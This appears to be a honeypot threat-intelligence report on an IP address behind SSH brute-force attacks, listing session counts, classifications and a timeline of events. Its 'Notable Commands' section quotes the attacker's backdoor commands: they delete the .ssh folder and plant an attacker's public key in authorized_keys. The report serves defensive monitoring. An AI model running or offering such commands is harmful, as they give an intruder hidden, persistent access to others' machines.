
103.200.22.162

Threat Confidence: 50%
Location: 🇻🇳 VN
ASN: AS135905 · VIETNAM POSTS AND TELECOMMUNICATIONS GROUP
Cloud Provider:
Total Events: 269 (Top 10% by volume)
Agent Count: 1
First / Last Seen: 2026-04-09 18:29 to 2026-04-09 18:59
Attack Types: ssh:bruteforce
MITRE ATT&CK Techniques: Initial Access, Defense Evasion, Credential Access, Command and Control
External Corroboration: Not flagged by any external feeds

Session Forensics
malware_dropper ×8, credential_harvester ×25, opportunistic_bruter ×8
Sessions: 41 (16 with login)
Avg Depth Score: 0.51
Commands Executed: 24
Files Downloaded: 8
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
03a80b21afa810682a776a7d42e5e6fb
SSH-2.0-libssh_0.11.1
Evidence Timeline
Credential Harvester 32928cdac05a w4m_seattle_01 · 2026-04-09 18:59
1 35%
Opportunistic Bruter b546b4a4b577 w4m_seattle_01 · 2026-04-09 18:58
1 50%
Malware Dropper 24da5bb6ed2c w4m_seattle_01 · 2026-04-09 18:58
3 1 1 100%
Credential Harvester 8001eedf20d6 w4m_seattle_01 · 2026-04-09 18:58
1 35%
Credential Harvester 5d942553f253 w4m_seattle_01 · 2026-04-09 18:56
1 35%
Credential Harvester 4ad8e3aafc47 w4m_seattle_01 · 2026-04-09 18:55
1 35%
Credential Harvester d429d1216b5f w4m_seattle_01 · 2026-04-09 18:54
1 35%
Credential Harvester bddd30d820f0 w4m_seattle_01 · 2026-04-09 18:53
1 35%
Credential Harvester 50c658c39570 w4m_seattle_01 · 2026-04-09 18:52
1 35%
Opportunistic Bruter 2a6d10c1c485 w4m_seattle_01 · 2026-04-09 18:50
1 50%
Malware Dropper 338f164c2577 w4m_seattle_01 · 2026-04-09 18:50
3 1 1 100%
Credential Harvester 80b023db02db w4m_seattle_01 · 2026-04-09 18:50
1 35%
Credential Harvester 6bd36790deb7 w4m_seattle_01 · 2026-04-09 18:49
1 35%
Opportunistic Bruter 43d204954908 w4m_seattle_01 · 2026-04-09 18:48
1 50%
Malware Dropper 06f90222b2a2 w4m_seattle_01 · 2026-04-09 18:48
3 1 1 100%
Credential Harvester 85dad3059965 w4m_seattle_01 · 2026-04-09 18:48
1 35%
Opportunistic Bruter 4583cf529291 w4m_seattle_01 · 2026-04-09 18:47
1 50%
Malware Dropper deef92120034 w4m_seattle_01 · 2026-04-09 18:47
3 1 1 100%
Credential Harvester c3dad1550960 w4m_seattle_01 · 2026-04-09 18:47
1 35%
Credential Harvester e5c69bbd46de w4m_seattle_01 · 2026-04-09 18:45
1 35%
Credential Harvester 0b9487a57872 w4m_seattle_01 · 2026-04-09 18:44
1 35%
Opportunistic Bruter 168bb27374df w4m_seattle_01 · 2026-04-09 18:43
1 50%
Malware Dropper 911f924a511c w4m_seattle_01 · 2026-04-09 18:43
3 1 1 100%
Credential Harvester b11cb4776761 w4m_seattle_01 · 2026-04-09 18:43
1 35%
Malware Dropper 76df7e571efa w4m_seattle_01 · 2026-04-09 18:42
3 1 1 100%
Opportunistic Bruter b54dd453b8b9 w4m_seattle_01 · 2026-04-09 18:42
1 50%
Credential Harvester ad18ffdcf1d7 w4m_seattle_01 · 2026-04-09 18:42
1 35%
Credential Harvester 382103c80a3b w4m_seattle_01 · 2026-04-09 18:40
1 35%
Malware Dropper 8d58cef931d4 w4m_seattle_01 · 2026-04-09 18:39
3 1 1 100%
Opportunistic Bruter 855e14c2adcc w4m_seattle_01 · 2026-04-09 18:39
1 50%
Credential Harvester 4a313d444d6e w4m_seattle_01 · 2026-04-09 18:39
1 35%
Credential Harvester 449bd9f604d4 w4m_seattle_01 · 2026-04-09 18:38
1 35%
Credential Harvester 190700a49f07 w4m_seattle_01 · 2026-04-09 18:36
1 35%
Credential Harvester 7fe641d54d7b w4m_seattle_01 · 2026-04-09 18:35
1 35%
Credential Harvester 40ca5981f7ce w4m_seattle_01 · 2026-04-09 18:34
1 35%
Opportunistic Bruter 5e6fc46d9623 w4m_seattle_01 · 2026-04-09 18:33
1 50%
Malware Dropper dd711062d278 w4m_seattle_01 · 2026-04-09 18:33
3 1 1 100%
Credential Harvester dcf336573dea w4m_seattle_01 · 2026-04-09 18:33
1 35%
Credential Harvester 2eb3d2d897be w4m_seattle_01 · 2026-04-09 18:32
1 35%
Credential Harvester b01311bf6f7e w4m_seattle_01 · 2026-04-09 18:30
1 35%
Credential Harvester 4bcbf8d8a283 w4m_seattle_01 · 2026-04-09 18:29
1 35%